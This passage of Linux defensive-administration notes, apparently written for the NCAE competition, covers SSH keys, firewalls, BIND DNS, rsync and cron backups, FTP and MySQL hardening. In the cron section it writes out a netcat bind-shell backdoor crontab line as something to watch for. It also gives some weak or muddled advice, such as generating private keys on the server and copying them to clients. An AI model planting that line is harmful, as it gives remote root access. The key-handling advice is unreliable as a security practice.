Through ssh, **`Passwordless Authentication`** is possible. On the server side, an account can be set up to use this passwordless authentication; keys are used to log in instead of a password. Typically, a new user is created for this specific function (hence the sudo command in the `mkdir` command); the first method of setting this up is done by creating the necessary files, as follows:
```bash
sudo adduser <user>

sudo ssh-keygen -t ecdsa -f ~/id_<user>_key   #generate more keys for particular user

sudo chmod 600 id_<user>_key     #rw access only to owner

sudo chown <user>:<group> /home/<user>/.ssh/id_<user>_key   #change ownership to the particular user

sudo chmod 644 id_<user>_key.pub    #rw access to owner, r acess to group and other

mkdir /home/<user>/.ssh    #sudo account creates an .ssh folder for the newly created account

sudo cp id_<user>_key.pub /home/<user>/.ssh/authorized_keys

sudo chmod 644 /home/<user>/.ssh/authorized_keys

sudo chmod 700 /home/<user>/.ssh    #change permissions of .ssh folder

sudo chown <user>:<group> /home/<user>/.ssh     #change ownership of directory. Now change the ownership of the authorized_keys file to the user

```

The public keys that exist within a user's **`authorized_keys`** file allows ssh access to any user with the corresponding private key. Once this process is complete, send the corresponding private key to another user. From the other machine - the client in this case - the existing ssh service can be leveraged to securely copy private keys through the  **`scp`** command, as follows:
```bash
scp <user>@<IP Address>:/home/<user>/id_<user>_key .     #the period is the currently located directory

```

At this point, the client computer can authenticate without a password:
```bash
ssh -i id_<user>_key <user>@<IP address> 

```

Setting up passwordless authentication can also be automated, running the following command on the server to automatically create the necessary files:
```bash
sudo ssh-keygen -t ecdsa -f /home/<user>/id_<user>_key

sudo ssh-copy-id -i /home/<user>/id_<user>_key <user>@<IP address>
```
This command installs the specified ssh keys on one's own ssh server. For that reason, the user should be the logged in user, and the IP address should be the same IP address of the current machine. Through this command, all of the permissions are set, so the **`scp`** command can be done right away. 

<a id="sshservthrurouter"></a>

#### **`SSH Service Through the Router`**

Again, by default, the external zone on CentOS enables ssh on the router. This is different from the port forwarding concept: services enabled on the CentOS machine allow external connections for that service on the CentOS machine, while port forwarding allows external devices (to the CentOS router) to communicate with internal devices (again, to the CentOS router) and vice-versa. The following focuses on the former, so the first step is to look at the status of the sshd service on the CentOS device:
```bash
systemctl status sshd
```
Once it is confirmed that the sshd service is active, look at the `/etc/ssh` folder. Like Kali and Ubuntu, the ssh configuration files and key-pairs will be listed. Similarly, **if the CentOS machine is cloned, the private key will not be secure,** as every other clone has the same key-pair. Remember to generate new ssh keys before setting up the external zone using the same commands as Ubuntu

<br>

Also, if the service is active, external machines can log in to the CentOS machine via ssh by default. Depending on the needs of the network, this setting can remain the same or be modified. This can be changed to only allow external ssh connections, or only internal ssh connections. 


Like the external zone, the internal zone also enables certain services, including: ssh, samba, dhcp client, and mdns. This can be confirmed by looking at the firewall settings of the internal zone:
```bash
sudo firewall-cmd --list-all --zone=internal

```
For the purposes of the NCAE competition, the external zone should not allow external ssh connections to the CentOS router; only the internal zone should be able to connect to the router. The following command changes these permissions:
```bash
sudo firewall-cmd --zone=external --permanent --remove-service=ssh

sudo firewall-cmd --reload

```
If, for whatever reason external ssh connections are desired, the following command adds the service again:
```bash
sudo firewall-cmd --zone=external --permanent --add-service=ssh

sudo firewall-cmd --reload

```
To allow external (to the router) ssh connections to an internal (to the router) machine, **port forwarding can be enabled.** This can be done with the following commands:
```bash
sudo firewall-cmd --zone=external --permanent --add-forward-port=port=22:proto=tcp:toport=22:toaddr=<IP Address>

sudo firewall-cmd --reload
```

<a id="dnssrvbasics"></a>

#### **`DNS Service Basics`**

From a client's perspective, DNS allows two questions:

**1. `Forward Lookup`:** Translates a domain name to the associated IP address. 

**2. `Reverse Lookup`:** Translates an IP address to the associated domain name.

With Linux distributions, DNS configuration files will not all be the same. They will vary from distribution to distribution, but this section focuses specifically on setting up a DNS server on an Ubuntu machine. 

<br>

First, get the IP address of this machine through the **`ip a`** command. The following are important steps into configuring the DNS server on this machine/

**1. Determine DNS Service Status**
```bash
systemctl status named

```

**2. Locate Important Configuration Files:** One of the most common installable DNS servers is known as **`BIND`.** Once it has been installed, there will be a directory located in `/etc/bind` that contains all of the related information. Within this directory, there will be a **`named.conf`** file, which contains most of the important configurations for the DNS server. Saying this, when checking the status of the DNS server, bind will not oftentimes not exist; it will be named.
* When freshly installed, the **`/etc/bind/named.conf`** file only includes other configuration files that do most of the work. These configuration files determine how the DNS server is set up; they are either segmented into different configuration files, or in one particular (named.conf) configuration file. More often than not, these configuration files are segmented for better manageability
   * **`/etc/bind/named.conf.options`** 
   * **`/etc/bind/named.conf.local`** 
   * **`/etc/bind/named.conf.default-zones`**

**At this point, the goal is to allow a locally hosted web server to be referenceable from a DNS server.** This allows internal network users to type a domain name on their browser instead of typing an IP address.

**3. Modify named.conf.default-zones:** This configuration file references the db.X files within the /bind directory. At this point, additional zones should be written into this file to allow forward and reverse lookups:
```bash
sudo nano named.conf.default-zones

# Go to the bottom of this file and set up additional zones

zone "domain.com" IN {        #forward lookup
      type master;
      file "/etc/bind/<new_dir>/forward.lookup.com";
      allow-update { none; };
};

zone "c.b.a.in-addr.arpa" IN {       #reverse lookup; write the network address in reverse order followed by the special notation
      type master;
      file "/etc/bind/<new_dir>/reverse.lookup.com";
      allow-update { none; };
};

```

**4. Create the Referenced Directories and Files:** Copy the `/etc/bind/db.empty` file twice to the newly created directories. It is better to copy this file because the permissions and ownership are retained
```bash
sudo mkdir <new_dir>

sudo cp /etc/bind/db.empty /etc/bind/<new_dir>/reverse.lookup.com

sudo cp /etc/bind/db.empty /etc/bind/<new_dir>/forward.lookup.com

```

**5. Configure the Referenced Files:** Remember that the text after the semicolons are commented out. The db.empty includes generic information, so they have to be edited. The following is file before any configuration:
```bash
$TTL    86400
@       IN      SOA     localhost. root.localhost. (
                              1         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                          86400 )       ; Negative Cache TTL
;
@       IN      NS      localhost.

```

For the **<u>Forward File:</u>** 
```bash
sudo nano /etc/bind/<new_dir>/forward.lookup.com

$TTL    86400
@       IN      SOA     domain.com root (
                              2         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                          86400 )       ; Negative Cache TTL
;
@       IN      NS      <DNS Server hostname>
<DNS hostname>          IN A        <DNS server IP address> #The DNS server should be included as a potential subdomain
www                     IN A        <web server IP address>
<more subdomains>       IN A        <web server IP address>
```
* From the generic file, replace the `localhost.` portion on the first line with the intended forward domain.
  *  Do **NOT** include the period
* On the same line, after the `root` text, remove the `.localhost.` text.
  * Keep the root portion, but do not include the periods before and after the localhost text.
* Increment the `Serial` line by one every time the file is modified for the change to take effect

* On the final line, replace the `localhost` text with the hostname of the DNS server. 
  * Again, do **NOT** keep the period after this. 
* After the final line, provide the subdomains followed by the IP address of the web server
  * subdomain [tab] IN A [tab] IP address
  * The DNS server should also be included as a potential subdomain, and should resolve to itself in the event that it is queried. 

<br>

For the **<u>Reverse File:</u>** 
```bash
sudo nano /etc/bind/<new_dir>/reverse.lookup.com

$TTL    86400
@       IN      SOA     domain.com. root.domain.com. (
                              2         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                          86400 )       ; Negative Cache TTL
;
@       IN      NS      <DNS Server hostname>.
x       IN  PTR         <DNS server hostname>.domain.com.
y       IN  PTR         www.domain.com.
y       IN  PTR         <subdomain>.domain.com
```
* From the generic file, replace the `localhost` portion on the first line with the intended domain.
  *  **INCLUDE the period**
* On the same line, after the `root` text, remove the `localhost` text and replace it with the domain. 
  * **Keep the periods** before and after the domain name
* Increment the `Serial` line by one every time the file is changed for it to take effect.

* On the final line, replace the `localhost` text with the hostname of the computer.
  * Again, **Keep the period**
* After the final line, write the IP addresses of the associated subdomains. Because the network address is written in reverse for reverse lookups, the included host information must follow the same rules. **Add periods after the domain.** 
  * This depends on the subnet mask; **the example shows a /24 mask, which is the same if it is reversed because it is only one octet.** The example shows x and y to represent the different IP addresses of the web server and DNS server; the final octet (x/y) is different.
    * Essentially, the octets are written in reverse, so w.x.y.z /16 will be c.d in this file. 
  * reverse octet [tab] In PTR [tab] subdomain.domain

<br>

**6. Update `/etc/resolv.conf` with the new DNS Server:** The computer must know where the DNS servers are for the DNS service to work. In this case, either the `/etc/netplan/01-network-manager-all.yaml` file can be modified to include a **nameserver** clause, or, better yet, the /etc/resolv.conf file can be edited:
```bash
sudo nano /etc/resolv.conf

nameserver x.x.x.x

```

**7. Test DNS Server:** Now that everything is configured, the DNS server can be activated. If the service does not start when booted, then it was misconfigured. If it starts, try both forward and reverse lookups through the web browser or CLI
```bash
sudo systemctl start named
```

<a id="dnssrvaddzones"></a>

#### **`DNS Service Additional Zones`**

The DNS server from one machine (in this case the Ubuntu machine) can also be the DNS server for another machine on the same network. For example, if the other machine was a Kali distribution, the Kali user would have to go to the `/etc/resolv.conf` file and add the IP address of the Ubuntu machine as a name server.
```bash
sudo nano /etc/resolv.conf

nameserver x.x.x.x

```

To add an additional forward lookup subdomain entry to the DNS server for a web server hosted on another machine (not the Ubuntu machine), the following steps need to be done:

**1. Write to the Previously Created Forward Lookup File**
```bash
sudo nano /etc/bind/<new_dir>/forward.lookup.com

```

**2. Modify the File**
* Increment the Serial number
* Add a subdomain and associated IP address
   * subdomain [tab] IN A [tab] IP address
* This command essentially adds a subdomain to the nameserver; however, this subdomain is hosted on another IP address. This IP address can be external to the network

**3. Restart NS Service**
```bash
sudo systemctl restart named

```

Adding another reverse lookup entry to the DNS server for a web server hosted on an external IP address is much different. In this case, another reverse entry needs to be created in the **`/etc/bind/named.conf.default-zones`** while adding information to the previously created reverse lookup file. The following steps detail how to do this:

**1. Add another Zone to the named.conf.default-zones File**
```bash
sudo nano named.conf.default-zones

zone "b.a.in-addr.arpa" IN {    #Put the network address in reverse. This example has a /16 netmask
      type master;
      file "/etc/bind/<new_dir>/reverse.lookup.com"      # use the same reverse lookup file as before
      allow-update { none; };
};

```

**2. Modify the Previously Created Reverse Lookup File**
```bash
sudo nano /etc/bind/<new_dir>/reverse.lookup.com
```
* Increment Serial number
* Add host octets (in reverse) and associated subdomain
   * d.c [tab] IN PTR [tab] subdomain.domain.extension.
   * make sure to add the period at the end of the extension (.com., .org., .edu., etc)

**3. Restart NS Service**
```bash
sudo systemctl restart named
```

<a id="dnssrvthrurouter"></a>

#### **`DNS Service Through the Router`**

When external machines query an internal DNS server, the request passes through the router. **The external machine must set its name server to the router's external IP address.** When the router receives the DNS request from the external machine, it will route it to the internal DNS server. The following steps detail how to properly configure a router to port forward DNS requests.

**1. Set the Router's External IP Address as the External Machine's NS**
```bash
sudo nano /etc/resolv.conf

nameserver x.x.x.x

```

**2. Configure DNS on the Router from an Internal Machine**
```bash
sudo firewall-cmd --zone=external --permanent --add-forward-port=port=53:proto=udp:toport=53:toaddr=x.x.x.x

sudo firewall-cmd --reload
```


<a id="rsyncetcronservbasics"></a>

#### **`Rsync and Cron Service Basics`**

**<u>Rsync</u>**

It is important to create backups for the running services on a machine. **`Rsync`** is used for backups and copying files on Linux. To effectively use rsync, a backup folder should be created to hold the backup contents. 
```bash
rsync -av --delete <Path/to/orginaldir> <Path/to/backupdir>
```
* The `-av` flag allows the copying of information from one location to another

* The `--delete` flag can be used to enforce consistency from the original directory to the backup directory. This essentially means that if one of the files was deleted in the original directory and the rsync command is run again, then the file will also be removed from the backup directory. This flag is optional, and depends on the needs of the network. 

If changes were made to a file after using the rsync command, they will remain only on the original copy until the rsync command is done again. When the command is run again, the rsync will show the user if changes have been made to a file by outputting the file name. This is what makes rysnc more effective than the `cp` command in certain cases. 

<br>

**<u>Cron</u>**

**`Cron`** helps administrators set up routine automated tasks. This service can be used to enable the automated scheduling of rsync. To determine whether cron is running, the following command can be performed:
```bash
systemctl status [cron, crond]

```

**`Crontabs`** are files that are created on the computer that could include automatic commands that are supposed to run. To add scheduled tasks, this file must first be opened with the following command, which prompts the user to select a text editor:
```bash
crontab -e 

```
* This command displays commented out instructions on creating a cron rule. Every time this command is run and a rule is created, cron automatically creates a specific crontab in the **/var/spool/cron/crontabs/\<user\>** directory.
   * The time of the automation can be set to concrete values or unrestricted. The setup will therefore be: `minute, hour, day of month, month, day of week`, where any value can be ***any*** by using the `*` value. 
   * If a crontab has a `*` for every value, that means every minute of every day. 

For example, the following command runs a backup of all the user accounts at 5 a.m. every week:
```bash
0 5 * * 1 tar -zcf /var/backups/home.tgz /home/

```
> After adding a rule to the cron tab, either wait a couple of minutes for the service to work OR restart the service by `sudo systemctl restart cron`

To view the exact location of the created crontab, sudo privileges are required. The following command can be used:
```bash
sudo ls /var/spool/cron/crontabs

```
As alluded, every time a user creates a crontab, a new file will be created in this directory with those user's crontabs. 

<br>

At this point, cron can be used with rsync for automatic backups:
```bash
crontab -e 

...

* * * * * rsync -a [--delete] /Absolute/Path/to/Originaldir /Absolute/Path/to/Backupdir

```

There are also system-wide crontabs, located in **`/etc/crontab`.** This file is owned by root, with **644** permissions; only root can edit this file. The set up of this file is similar to that of the user crontabs, with minor changes. The crontabs in this file will occur regardless of whether the user is active or not, hence why a user must be specified. For critical tasks, it is recommended that they are included in this file with **`root`** as the username. With this file, it is important to determine which services are critical to the machine and require minimum downtime. Consider the files that are linked to those services and back them up. 
```bash
sudo nano /etc/crontab

* * * * * root rsync -a /Absolute/Path/to/Originaldir /Absolute/Path/to/Backupdir

```
Also, make sure to look at the contents of this file. A backdoor can be created for the root user using netcat. This can be done with the following command:
```bash
sudo nano /etc/crontab

* * * * *  root nc -lp <port> -e /bin/bash
```



<a id="rsyncetcronautsecbackups"></a>

#### **`Rsync and Cron Automatic Secure Backups`**

Backups can also be sent to another device on the network. If ssh is available on the *backup machine*, secure connections can be created using rsync. First, on the *backup machine*, determine whether an ssh server is available:
```bash
systemctl status [ssh, ssh]

```

If ssh is available, but it is inactive, start the service:
```bash
sudo systemctl restart ssh
```
By default, this server should allow connections to any available IP addresses on the machine on port 22. Therefore, once this service is activated, other machines should be able to connect via ssh. Once it is confirmed that a connection can be established, **the *backup machine* should create a backup folder** to hold the backups of the main machine.

Now, on the main machine, run the following command to use rsync across ssh:
```bash
rsync -av [--delete] -e ssh /Absolute/Path/Main/Computer <username>@<IP address>:/Absolute/Path/Backup/Computer/
```
* The `-e` flag is used to execute rsync using another service, like ssh, telnet, ftp, etc

<br>

To combine this functionality with **`cron`,** the user must first prove that they can authenticate with ssh across the network, but will be unable to do so because the password prompt will be backgrounded. In this case, **`Passwordless Authentication`** can be used for ssh to avoid directly including the ssh password in the crontab file or having to manually type the password everytime the cron service is scheduled. While following the proceeding steps, it is important to be mindful of the keys, as an attacker could potentially gain access to the backup server due to mismanaged keys:

**1. Create Key-Pair on the Client** 
```bash
ssh-keygen -t ecdsa -f backup_keys
```

Once the keys are generated, the **`client` must keep the `private key`** and the **`server` (where the authentication happens) must be securely given the `public key`.** The permission of the private key is critical at this stage, so ensure that it only has rw permissions for the owner. 

**2. Securely Store the Private Key:** For create an effective automatic backup, the crontab should not be created for a specific user but for the system; therefore, the root user should be given the private key to run the backup automatically. In this case, **the private key should be stored in the `/root` directory** to ensure that only users with proper credentials can access it. 
```bash
sudo chown root:root backup_keys

sudo mv backup_keys /root

```

**3. Securely Copy the Public Key to the Server:** After the public key is transferred to the server, the administrator can either delete it from their machine or move it to the /root directory with the private key. It is a better idea to move it to the /root directory.
```bash
scp backup_keys.pub <username>@<IP address>:<Absolute/Path/Backup/Computer>

```

**4. Configure Passwordless Authentication on the Server:** Once the public key is on the *backup machine*, the **public key must exist in the `~/.ssh/authorized_keys` file.** If the server does not yet have this directory and file created, it can be created through the following:
```bash
mkdir ~/.ssh 

chmod 700 ~/.ssh

cp backup_keys.pub ~/.ssh/authorized_keys

chmod 600 ~/.ssh/authorized_keys    #in certain distros, this can also be 644

```

**5. Run Rsync on Client for Specific User on Server:** In the following command, the ssh command is wrapped in quotes to specify that the `-i` flag is for ssh and not rsync. 
```bash
sudo rsync -av -e "ssh -i /root/backup_keys" /Path/Main/Computer/ <username>@<IP address>:/Absolute/Path/Backup/Computer/

```

**6. Run Rsync as Crontab via Passwordless Authentication**
```bash
sudo nano /etc/crontab

...

* * * * * root rsync -a -e "ssh -i /root/backup_keys" /Absolute/Path/Main/Computer/ <username>@<IP address>:/Absolute/Path/Backup/Computer/
```
* In this example, the `/` ending after the directory that contains the files that are to be backed (/Absolute/Path/Main/Computer/) up forces rsync to only backup the files within the directory. If the `/` is excluded after the directory, then the directory that contains the files will also be backed up

<a id="introtofwswufw"></a>

#### **`Intro to Firewalls with UFW`**

Most Linux systems have **`IP Tables`,** which are used to configure a firewall. Because IP tables are complicated, many administrators put additional software on top of the IP tables to help with management; in Ubuntu, **`UFW`** is this additional software. By default, UFW is inactive so the firewall rules are unrestricted initially. To view the initial status of UFW and activate it, the commands can be executed:
```bash
sudo ufw status verbose

sudo ufw enable

```

By default, incoming traffic is denied and outgoing traffic is allowed. Because of this, rules must be created; however, before creating any, it is important to determine what rules are appropriate for the machine, the network, and the environment:

**Creating a UFW Allow Rule:** Allow rules allow specific IP addresses or network ranges to send traffic. This should only be done if the machine/network is trusted. Once rules are added to UFW, they can be checked by using the aforementioned `status` command. 
```bash
sudo ufw allow from x.x.x.x   #specific IP address

sudo ufw allow from x.x.x.0/CIDR    #network range w/ CIDR

```

**Adding Service Rules:** This is important to add if services are running on the Ubuntu machine. If just allowing certain services without additional information, then UFW will automatically allow connections to the service from anywhere. Also, this will automatically create a rule for IPv6, which can open up the attack surface if IPv6 is not used within the network. 
```bash
sudo ufw allow ssh      #from anywhere

sudo ufw allow ssh from x.x.x.x

sudo ufw allow ssh from x.x.x.0/CIDR

```

**Removing Rules:** Because each user-created rule is numbered, it is possible to remove the rule by its assigned number. Everytime a rule is deleted, the numbered list is renumbered accordingly. 
```bash
sudo ufw status numbered

sudo ufw delete <number>

```

**Creating a UFW Deny Rule:** If an allow rule permits traffic from a specific IP address but the deny rule blocks traffic from that network, the order in which the rules are input will begin to matter. Because of this, it is important to create the allow rules first 
```bash
sudo ufw deny from x.x.x.x    #specific IP address

sudo ufw deny from x.x.x.0/CIDR     #network range w/ CIDR       

```

**Edit Default Rules:** When rules are added to UFW, the default rules may take precedence. For example, if a network was included in a deny rule, a user within that network may still be able to ping the machine with the UFW. In this case, the configuration files containing the default rules can be edited within the **`/etc/ufw`** directory. The **`before.rules`** contains rules that will process before the user-created rules. Accordingly, the **`after.rules`** file contains rules that process after the user-created rules.
* If needed, the **`/etc/ufw/before.rules`** file can be edited
   * Within the ICMP rules, each line ends with ACCEPT, thus allowing users on a denied network to ping the machine with the configured UFW. These can be changed with DROP for the ICMP INPUT rules. 
* Within this file, it is also important to note the difference between INPUT and FORWARD rules. **INPUT** refers to traffic coming into the host computer, and **FORWARD** refers to traffic going onto another computer. 

After making changes to the **before.rules** file, the firewall must be reloaded
```bash
sudo ufw reload

```


<a id="activecondefense"></a>

#### **`Active Connection Defense`**

To view active connections to the host machine, the **`netstat`** command can be used. The active connections are displayed at the top of the output, showing the local IP address followed by the service that is being used, and the foreign IP address followed by the ephemeral port. All of the information may be overwhelming, so netstat should be filtered to only show TCP and UDP information:
```bash
netstat -tu       #shows service name

netstat -tun      #resolves the name of the service

netstat -tuna     #shows what ports are listening on the local machine

sudo netstat -tunap    #shows PID and additional information for each connection

```

If an active connection needs to be terminated, the PID must be obtained first. Once obtained, the command can be killed:
```bash
sudo kill <PID>

```

If netstat is not installed, the **`ss`** command can be used in lieu. Be mindful that the active connections are displayed at the bottom of the output, showing effectively the same information as netstat. 
```bash
ss

```

To see who is logged in on the machine, the **`w`** command can be used. The output shows active connections from specific foreign IP addresses. If a user has a connection from **`:0`,** that means that they logged in using the GUI. Because of this, be weary of the active connections on foreign machines.  
```bash
w

```

An active connection can be terminated by usernames. If there are two people logged in as the same user, the foreign user should be terminated via PID. In this case, if the active connection is terminated by username, then both users will be logged out. 
```bash
sudo pkill -KILL -u <username>

```

Like Task Manager in Windows, the **`top`** command monitors system processes. **`ps`** can also be used, but should be used with additional flags to get more information:
```bash
ps -aux     #shows which users are running which processes 

```

To send broadcast messages to logged in users, the **`wall`** or **`write`** command can be used:
```bash
wall "<message>"

sudo write <user> <TTY>    #will start messaging session between the local and specified users
```

<a id="mikrotik"></a>

#### **`MikroTik Router`**

Because CentOS is deprecated, MikroTik has become more popular (still not as popular as Cisco IOS). MikroTik is still Linux-based. The default username is **`admin`** with no password. On the initial login, the user is prompted to create a password. 

Even if there are ethernet connections to the router, nothing will be returned on a fresh installation. However, to see the initial **IP address configuration,** the following command can be input:
```bash
/ip address print

```

To see the **names of the interfaces**, even if the ethernet connections are not logically defined, the following command can be input:
```bash
/interface print

#The interfaces will likely be named etherX, where X is a number. 

```

Before assigning an IP address, determine which interface is connected to the internal network and external network. Once this is done, **assign the IP address to the corresponding interface and test internal/external connectivity:**
```bash
/ip address add address=<IP address>/<CIDR> interface=etherX

/ping <IP address>

/ip route print

```

If an incorrect IP address was added, first look at the corresponding number (denoted by the value under the # next to the interface). Once this is determined, it can be removed through the CLI:
```bash
/ip address remove <number>

```

Unnecessary services can be running on the router by default, like FTP or telnet. Because MikroTik has an HTTP port open on port 8080, credentials can be sniffed through telnet if port 8080 is used. 
```bash
/ip service print 

/ip service disable <number>

```

Once the internal servers are set up, it is possible to set up port forwarding on the router directly through its CLI or through an internal machine via **`Port 8080` on a web browser. This should only be used after Telnet is disabled** 
* Most configurations can be set through the Quick Set option. All changes should be applied instantly, so there is no need to restart any services on the router
   * Check `Enable NAT`
   * Check `Bridge All LAN Ports`
* To set up port forwarding, click `Port Mapping` in the Quick Set option 
   * For internal web servers, type 80 for both port options and the IP address of the web server (this is for external traffic coming to the internal network)

<a id="ftpservbasicsncae"></a>

#### **`FTP Service Basics`**

One of the most used FTP servers on Linux distros is **`vsFTPd`.** The default configuration of vsFTPd can be found in **`/etc/vsftpd.conf`;** some settings are already predefined by default. To install vsFTPd, the following command can be executed:
```bash
sudo apt install vsftpd 

```
To look at the active configurations, the following command can be executed:
```bash
cat /etc/vsftpd.conf | grep -v "#"

```

The following are configurations that are present within the vsftpd configuration file. 

<center>

|Setting|Description|
|-------|-----------|
|listen=NO|Run from inetd or as a standalone daemon|
|listen_ipv6=YES|Listen on IPv6?|
|anonymous_enable=NO|Enable Anonymous access?|
|local_enable=YES|Allow local users to login?|
|write_enable=YES|Allows any form of an FTP write command|
|dirmessage_enable=YES|Display active directory messages when users go into certain directories?|
|use_localtime=YES|Use local time?|
|xferlog_enable=YES|Activate logging of uploads/downloads?|
|connect_from_port_20=YES|Connect from port 20?|
|secure_chroot_dir=/var/run/vsftpd/empty|Name of an empty directory|
|pam_service_name=vsftpd|This string is the name of the PAM service vsftpd will use|
|rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem|The last three options specify the location of the RSA certificate to use for SSL encrypted connections.
|rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key||	
|ssl_enable=NO||	

</center>

Before starting the service, the `vsftpd.conf` file should be properly configured. For the NCAE competition, the following configurations should be:
```bash
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES      #restricts users to their home directory

#add the following directives to the conf file
user_sub_token=$USER          #needs to be added to the conf file
local_root=/home/$USER/ftp    #needs to be added to the conf file


userlist_enable=YES
userlist_file=/etc/vsftpd.userlist
userlist_deny=NO              #only users within the .userlist file can access the FTP service
```

Setting userlist_deny to NO is more secure because of the implicit deny feature. To add to the userlist, perform the following command after setting up an FTP user:
```bash
sudo touch /etc/vsftpd.userlist

echo "<user>" | sudo tee -a /etc/vsftpd.userlist

```

**1. Create FTP user:** There should be a unique user which the FTP server can use as a totally isolated and unprivileged user. With the chroot_local_user configuration, the defined user will be restricted to only their home directory. 
```bash
sudo adduser ftp_client

```

**2. Set up FTP user's directory:** Start by setting up an FTP directory within the new user's home path. The FTP directory serves as the chroot; this directory should not have write permissions for any group. 
```bash
sudo mkdir /home/ftp_client/ftp

sudo chown nobody:nogroup /home/ftp_client/ftp

sudo chmod a-w /home/ftp_client/ftp

```

**3. Set up a writable directory for the FTP user:** Because the chroot ftp directory is not writable, a writeable file directory needs to be created that stores accessible files (from the POV of the FTP user).
```bash
sudo mkdir /home/ftp_client/ftp/files

sudo chown ftp_client:ftp_client /home/ftp_client/ftp/files

```

> For all of the users that need FTP access, or need to be accessed through FTP, steps #3 and #4 can be repeated in the same format. 

**4. Store files in the `files` directory:** This can be done by copying or moving files to the /ftp/file directory and then changing the ownership (so that ftp_client owns the files).

**5. Check FTP server status**
```bash
systemctl status vsftpd

```

**6. Start FTP server status**
```bash
sudo systemctl start vsftpd

sudo systemctl restart vsftpd
```

<a id="mysqlservicebasicsncae"></a>

#### **`MySQL Service Basics`**

Before looking at the configuration files, determine which version of MySQL is being used:
```bash
mysql --version

systemctl status mysql

```

Start the MySQL service and then attempt the initial installation. After starting MySQL and the following commands are not available, then manual configuration is required:



MariaDB is a fork of MySQL, so the initial installation is similar. If the following commands are not available, then manual configuration is required; if this is the case, configure the relevant files and then start mysql when indicated:
```bash
sudo systemctl start mysql

sudo mysql-secure-installation

sudo mariadb-secure-installation

```

With either installation, it will ask the following questions:
1. **Enter root password:** Enter a strong password; if no password is entered, anyone can connect to the MySQL server as root without a password and be granted all privileges.
2. **Switch to unix_socket authentication:** This is a plug-in that allows users to authenticate to the DB server using the same authentication system used on the server itself. 
   * If connected to the server as a root user, this will authenticate the user to the DB server as the root user. 
   * This is enabled by default when MariaDB is installed. Because this is already enabled, enter no here
3. **Change the root password:** If necessary
4. **Remove anonymous user:** yes
5. **Disallow root login remotely:** yes
6. **Remove test database and access to it:** yes
7. **Reload privilege tables:** yes

If the secure-installation command worked, then skip the manual configuration portion and go to the actual database set up.


<br>

If neither of these secure installation commands are available, manual configuration would be required:

**1. Set up configuration file:** Different files will be modified, depending whether MySQL or MariaDB is being used. Either way, the file looks the same
   * For MySQL, edit the `/etc/mysql/my.cnf` file
   * For MariaDB, edit the `/etc/mysql/mariadb.conf.d/50-server.cnf` file
```bash
user            = mysql
pid-file        = /var/run/mysqld/mysqld.pid
socket          = /var/run/mysqld/mysqld.sock
port            = 3306
basedir         = /usr
datadir         = /var/lib/mysql
tmpdir          = /tmp
lc-messages-dir = /usr/share/mysql
skip-external-locking
bind-address    = 127.0.0.1

```

**2. Set up permissions:** Ensure the MySQL/MariaDB directories and configuration files have secure permissions
```bash
sudo chown mysql:mysql /var/lib/mysql     #this is set by default anyways, but check anyways

sudo chmod 750 /var/lib/mysql             #this is set to 755 by default

sudo chown mysql:mysql /etc/mysql/my.cnf  #owned by root by default

sudo chmod 640 /etc/mysql/my.cnf          #set to 755 by default

```

**3. Start MySQL:** Once the service is started, try to log in to mysql as root, then go through the steps of adding users, granting privileges, creating databases, etc. 
```bash
sudo systemctl start mysql

sudo mysql -u root -p

```

**4. Secure the root account:** Ensure that the root account has a strong password and is not remotely accessible
```sql
ALTER USER 'root'@'localhost' IDENTIFIED BY 'new_strong_password';
UPDATE mysql.user SET Host='localhost' WHERE User='root';
FLUSH PRIVILEGES;

```

**5. Remove anonymous user:** This has to be done if the secure-installation command was not available
```sql
DELETE FROM mysql.user WHERE User='';
FLUSH PRIVILEGES;

```

**6. Remove Test DB:** This DB is not needed and opens up the attack surface
```sql
DROP DATABASE IF EXISTS test;
DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_%';
FLUSH PRIVILEGES;

```

Once all of the configuration files are set up, the following commands can be done to fully set everything up. 

**1. Add users:** Once the root user is set up, additional users can be created so that root is not the only account that can access the database. Note that the user does not have to be created through the `adduser` or `useradd` command:
```bash
sudo mysql -u root -p
```
```sql
MariaDB [(none)]> CREATE USER 'new_username'@'localhost' IDENTIFIED BY 'password';     --for local access

MariaDB [(none)]> CREATE USER 'new_username'@'%' IDENTIFIED BY 'password';             --for remote access

```

**2. Alter user information**
```sql
MariaDB [(none)]> ALTER USER 'username'@'localhost' IDENTIFIED BY 'new_password';      --same for remote access user
FLUSH PRIVILEGES;

```

**3. Grant privileges to the new user:** The first command can be done to grant privileges on a specific database. The second command can be done to grant all privileges on all databases:
```sql
MariaDB [(none)]> GRANT ALL PRIVILEGES ON database_name.* TO 'new_user'@'localhost';

MariaDB [(none)]> GRANT ALL PRIVILEGES ON *.* TO 'new_user'@'localhost';

```

If expecting a connection to the DB server via SSH, specifying localhost for local access makes more sense. If not expecting an ssh connection to the DB server, then specifying % for remote access makes the most sense. In this case, the remote user would gain access by:
```bash
mysql -u <username> -p -h <IP address to DB server>

```

Adding databases, entities, data into the entities, and querying the entities all use standard SQL; however, selecting the database to be used requires the `USE database_name;` command